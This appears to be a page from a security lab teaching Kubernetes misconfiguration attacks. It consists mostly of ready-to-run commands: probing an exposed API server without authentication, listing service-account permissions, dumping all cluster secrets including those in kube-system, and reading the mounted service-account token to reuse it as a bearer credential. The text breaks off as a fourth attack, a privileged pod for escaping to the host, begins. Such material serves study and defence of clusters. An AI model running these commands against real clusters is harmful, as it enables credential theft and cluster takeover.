⚠️ Pracivo Security Lab — Docker escape, Kubernetes misconfig, CI/CD secret exposure, supply chain attacks.
Kubernetes Misconfiguration Attacks
K8S ESCAPE
CLUSTER TAKEOVER
# ATTACK 1: Exposed Kubernetes API (unauthenticated)
curl -sk https://192.168.1.100:6443/api/v1/namespaces
# If it returns data without auth — API server is open
# ATTACK 2: Overpermissive ServiceAccount
# Check what your pod's service account can do:
kubectl auth can-i --list
# If output shows: * * * — you can do everything as cluster-admin
# Enumerate cluster:
kubectl get pods --all-namespaces
kubectl get secrets --all-namespaces
kubectl get nodes
# Read all secrets (DB passwords, API keys, tokens):
kubectl get secret -n kube-system -o yaml
# ATTACK 3: Service Account Token Abuse
# Token is mounted in every pod at:
cat /var/run/secrets/kubernetes.io/serviceaccount/token
cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt
# Use it to talk to the API:
KUBE_TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
curl -sk -H "Authorization: Bearer $KUBE_TOKEN" https://kubernetes.default.svc/api/v1/namespaces
# ATTACK 4: Create privileged pod to escape to host
kubectl apply -f - <